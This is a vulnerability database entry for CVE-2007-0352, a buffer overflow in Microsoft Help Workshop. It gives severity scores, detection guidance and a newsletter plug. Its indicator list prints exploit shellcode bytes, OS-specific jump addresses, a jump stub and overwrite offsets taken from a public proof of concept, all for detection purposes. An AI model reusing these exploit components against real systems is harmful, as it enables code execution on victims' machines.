cbcvebase.
CVE-2007-0352
published 2007-01-19

CVE-2007-0352: Stack-based buffer overflow in Microsoft Help Workshop 4.03.0002 allows user-assisted remote attackers to execute arbitrary code via a crafted .cnt file…

PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
36.38%
98.3th percentile
Stack-based buffer overflow in Microsoft Help Workshop 4.03.0002 allows user-assisted remote attackers to execute arbitrary code via a crafted .cnt file composed of lines that begin with an integer followed by a space and a long string.

Affected

1 ranges
VendorProductVersion rangeFixed in
microsofthtml_help_workshop

Detection & IOCsextracted from sources · hover to see the quote

filename.cnt
versionMicrosoft Help Workshop 4.03.0002
otherjmpEspPtr: 0x7cfdbd1b (OS index 0)
otherjmpEspPtr: 0x784452e4 (OS index 1)
otherjmpEspPtr: 0x7d0812e4 (OS index 2)
otherjmpEspPtr: 0x7cc58fd8 (OS index 3)
otherjmpEspPtr: 0x775e6247 (OS index 4)
bytes
0x66,0x83,0xc4,0x10,0x8b,0xc4,0x66,0x81,0xec,0x10,0x21,0x50,0x66,0x2d,0x11,0x11,0x50,0xb8,0x7a,0x6b,0x3f,0x79,0xff,0xd0,0x58,0x50,0x80,0x38,0x20,0x74,0x49,0x5b,0x53,0x33,0xc0,0xb0,0xff,0x50,0x66,0x81,0xeb,0x11,0x05,0x53,0xb8,0x23,0x2d,0x3f,0x79,0x3c,0xff,0x75,0x02,0x32,0xc0,0xff,0xd0,0x58,0x50,0x66,0x2d,0x11,0x05,0x32,0xdb,0x38,0x18,0x74,0x03,0x40,0xeb,0xf9,0x5b,0x53,0x32,0xd2,0xb1,0x5c,0x88,0x08,0x40,0x38,0x13,0x74,0x08,0x8a,0x0b,0x88,0x08,0x43,0x40,0xeb,0xf4,0x32,0xd2,0x88,0x10,0x58,0x50,0x66,0x2d,0x11,0x05,0x48,0x40,0x8b,0xd0,0x58,0x50,0x66,0x2d,0x11,0x11,0x50,0x33,0xc9,0x51,0x51,0x51,0x51,0x51,0x51,0x51,0x52,0xb8,0x10,0x50,0x3f,0x79,0xff,0xd0,0x33,0xc0,0x50,0xb8,0xda,0x69,0x3f,0x79,0xff,0xd0
bytes
0xe9,0x1b,0xfe,0xff,0xff
  • Malicious .cnt files triggering this vulnerability begin each line with an integer followed by a space and a long string — detect anomalously long lines (>500 bytes) in .cnt files opened by Help Workshop (hcw.exe).
  • The exploit payload embeds the ASCII marker string '0 Microsoft Help Workshop PoC exploit by porkythepig' at the start of the crafted .cnt file; scan file content for this string.
  • The exploit buffer is exactly 619 bytes; a .cnt file of exactly this size containing shellcode is a strong indicator of exploitation.
  • The return address overwrite occurs at offset 0x210 (528 bytes) into the exploit buffer; stack inspection or crash analysis showing EIP control at this offset confirms exploitation.
  • The backward jump stub (0xe9,0x1b,0xfe,0xff,0xff) is written at offset 0x218 in the buffer to redirect execution back into the shellcode; presence of this 5-byte near-jump sequence near the overwrite region is a shellcode indicator.
  • Monitor hcw.exe (Microsoft Help Workshop) for spawning unexpected child processes such as notepad.exe or other user-supplied executables, which is the payload delivery mechanism of this exploit.
  • ·The exploit ships five hardcoded OS-specific API address tables (jmpEspPtr and API pointers); the correct table must match the target OS/DLL version — detections relying on specific return addresses will only match the targeted OS variant.
  • ·The vulnerability is user-assisted (requires the victim to open a crafted .cnt file); exploitation is not remote/unauthenticated without a social-engineering vector.
  • ·Microsoft Help Workshop 4.03.0002 is a standard component of MS Visual Studio 6.0 and 2003 (.NET); the attack surface exists on any developer workstation with these IDE versions installed.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.